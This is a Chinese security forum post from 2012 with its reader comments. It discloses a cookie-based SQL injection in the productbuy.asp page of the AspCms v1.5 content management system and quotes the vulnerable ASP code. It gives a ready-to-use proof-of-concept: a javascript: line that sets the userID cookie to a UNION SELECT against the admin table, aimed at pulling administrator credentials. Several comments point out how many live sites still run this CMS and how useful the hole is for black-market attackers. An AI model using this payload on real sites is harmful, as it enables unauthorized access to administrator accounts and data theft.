AspCms_v1.5_20110517 SQL注射

2012-12-24 17:48:19 22 my5t3ry 4687

好久没上土司了，上来一看发现在删号名单内.....
也没啥好发的，前些天路过某个小站，用的AspCms这个系统，搜索了下，productbuy.asp这个文件存在注射，但是目标已经修补....下载了代码，很奇葩的是productbuy.asp这个文件官方虽然修补了网上提到的漏洞，但是就在同一个文件下面找到了注射漏洞。。。。。。。
废话不多说，看代码：

<%

if action = "buy" then

        addOrder()

else

        echoContent()

end if



……略过



Sub echoContent()

        dim id

        id=getForm("id","get")

        

        if isnul(id) or not isnum(id) then alertMsgAndGo "请选择产品！","-1" 

        

        dim templateobj,channelTemplatePath : set templateobj = mainClassobj.createObject("MainClass.template")

        dim typeIds,rsObj,rsObjtid,Tid,rsObjSmalltype,rsObjBigtype,selectproduct

        Dim templatePath,tempStr

        templatePath = "/"&sitePath&"templates/"&defaultTemplate&"/"&htmlFilePath&"/productbuy.html"



        set rsObj=conn.Exec("select title from aspcms_news where newsID="&id,"r1")

        selectproduct=rsObj(0)

        

        Dim linkman,gender,phone,mobile,email,qq,address,postcode

        if isnul(rCookie("loginstatus")) then  wCookie"loginstatus",0

        if rCookie("loginstatus")=1 then  

                set rsObj=conn.Exec("select *  from aspcms_Users where UserID="&trim(rCookie("userID")),"r1")

                linkman=rsObj("truename")

                gender=rsObj("gender")

                phone=rsObj("phone")

                mobile=rsObj("mobile")

                email=rsObj("email")

                qq=rsObj("qq")

                address=rsObj("address")

                postcode=rsObj("postcode")

        else 

                gender=1

        end if

        rsObj.close()

                

        with templateObj 

                .content=loadFile(templatePath)        

                .parseHtml()

                .content=replaceStr(.content,"{aspcms:selectproduct}",selectproduct)

                .content=replaceStr(.content,"[aspcms:linkman]",linkman)                

                .content=replaceStr(.content,"[aspcms:gender]",gender)                

                .content=replaceStr(.content,"[aspcms:phone]",phone)                

                .content=replaceStr(.content,"[aspcms:mobile]",mobile)                

                .content=replaceStr(.content,"[aspcms:email]",email)                        

                .content=replaceStr(.content,"[aspcms:qq]",qq)                        

                .content=replaceStr(.content,"[aspcms:address]",address)                        

                .content=replaceStr(.content,"[aspcms:postcode]",postcode)        

                .parseCommon()                 

                echo .content 

        end with

        set templateobj =nothing : terminateAllObjects

End Sub

漏洞很明显，没啥好说的
poc：

javascript:alert(document.cookie="loginstatus=" + escape("1"));alert(document.cookie="userID=" + escape("1 union select 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2 from [Aspcms_Admins]"));

另外，脚本板块没权限发帖子

类别 Web安全

关于作者

my5t3ry27篇文章294篇回复

http://hi.baidu.com/my5t3ry

评论22次

要评论？请先登录或注册

22楼

lan404
2013-3-3 08:50

谢谢楼主分享

回复|@ta|踩(0)|顶(0)
21楼

1006079161
2013-3-3 01:05

旁注的时候应该很给力

回复|@ta|踩(0)|顶(0)
20楼

uedbox
2013-1-5 23:51

此CMS好像很多站在使用，虽然年前的，肯定一堆站在悲剧

回复|@ta|踩(0)|顶(0)
19楼

evildns
2013-1-5 21:22

好东西用这程序的还是挺多的

回复|@ta|踩(0)|顶(0)
18楼

jk影
2013-1-4 18:05

rcookie函数没过滤吗？能带点注释就好多了

回复|@ta|踩(0)|顶(0)
17楼

hualuowusheng
2012-12-30 14:20

谢谢分享！！

回复|@ta|踩(0)|顶(0)
16楼

skyfly
2012-12-28 08:40

楼主金币xi引人啊

回复|@ta|踩(0)|顶(0)
15楼

websafe
2012-12-25 20:53

表示用这个程序的站很多，只是版权被马克了，搞黑产的有福了

回复|@ta|踩(0)|顶(0)
14楼

M3loee
2012-12-25 16:05

漏洞很明显，没啥好说的

回复|@ta|踩(0)|顶(0)
13楼

kauchang
2012-12-25 14:30

高帅富！！绝对的

回复|@ta|踩(0)|顶(0)
12楼

xiaofeihk
2012-12-25 13:49

表示LZ钱真的很多。。

回复|@ta|踩(0)|顶(0)
11楼

爱开始的地方
2012-12-25 13:33

楼主money好给力。。。

回复|@ta|踩(0)|顶(0)
10楼

uuwhat
2012-12-25 08:27

Cookie注入哦

回复|@ta|踩(0)|顶(0)
9楼

5inb4d
2012-12-24 22:38

set rsObj=conn.Exec("select * from aspcms_Users where UserID="&trim(rCookie("userID")),"r1") cookie注入伤不起啊... 估计是发布了最新版就没补这个洞了

回复|@ta|踩(0)|顶(0)
8楼

csser
2012-12-24 22:34

楼主高富帅- -

回复|@ta|踩(0)|顶(0)
7楼

darker
2012-12-24 22:30

木有cookie欺骗的那个给力。。。直接后台。

回复|@ta|踩(0)|顶(0)
6楼

a1258771
2012-12-24 19:39

好有钱

回复|@ta|踩(0)|顶(0)
5楼

xiaoxu
2012-12-24 19:31

支持一下~~~~~~

回复|@ta|踩(0)|顶(0)
4楼

风痕
2012-12-24 18:55

楼主好有钱啊。。

回复|@ta|踩(0)|顶(0)
3楼

weijuma
2012-12-24 18:35

我看来楼主金币的

回复|@ta|踩(0)|顶(0)

AspCms_v1.5_20110517 SQL注射

关于作者

评论22次

谢谢楼主分享

旁注的时候应该很给力

此CMS好像很多站在使用，虽然年前的，肯定一堆站在悲剧

好东西 用这程序的还是挺多的

rcookie函数没过滤吗？ 能带点注释就好多了

谢谢分享！！

楼主金币xi引人啊

表示用这个程序的站很多，只是版权被马克了，搞黑产的有福了

漏洞很明显，没啥好说的

高帅富！！ 绝对的

表示LZ钱真的很多。。

楼主money好给力。。。

Cookie注入哦

set rsObj=conn.Exec("select * from aspcms_Users where UserID="&trim(rCookie("userID")),"r1") cookie注入伤不起啊... 估计是发布了最新版就没补这个洞了

楼主高富帅- -

木有cookie欺骗的那个给力。。。直接后台。

好有钱

支持一下~~~~~~

楼主好有钱啊。。

我看来楼主金币的

热门文章

安全资讯致数千人伤亡的寻呼机为何能爆炸？专家：或黑客入侵致电池过载，或内部被对手安装了爆炸物

安全资讯黑客入侵自行车：无线换档系统存在漏洞

渗透测试车联网攻击链路图

安全资讯Godzilla 无文件后门利用 Atlassian Confluence漏洞 CVE-2023-22527

最新回复

精华推荐

CTF研究带你走进 S7COMM 与 MODBUS 工控协议

渗透测试初级域渗透系列 03. 常见攻击方法 - 2

渗透测试代理转发工具汇总分析

渗透测试前端加密对抗2-通过CDP远程调用Debug断点函数

逆向破解溢出入门文章Ver.1

好东西用这程序的还是挺多的

rcookie函数没过滤吗？能带点注释就好多了

高帅富！！绝对的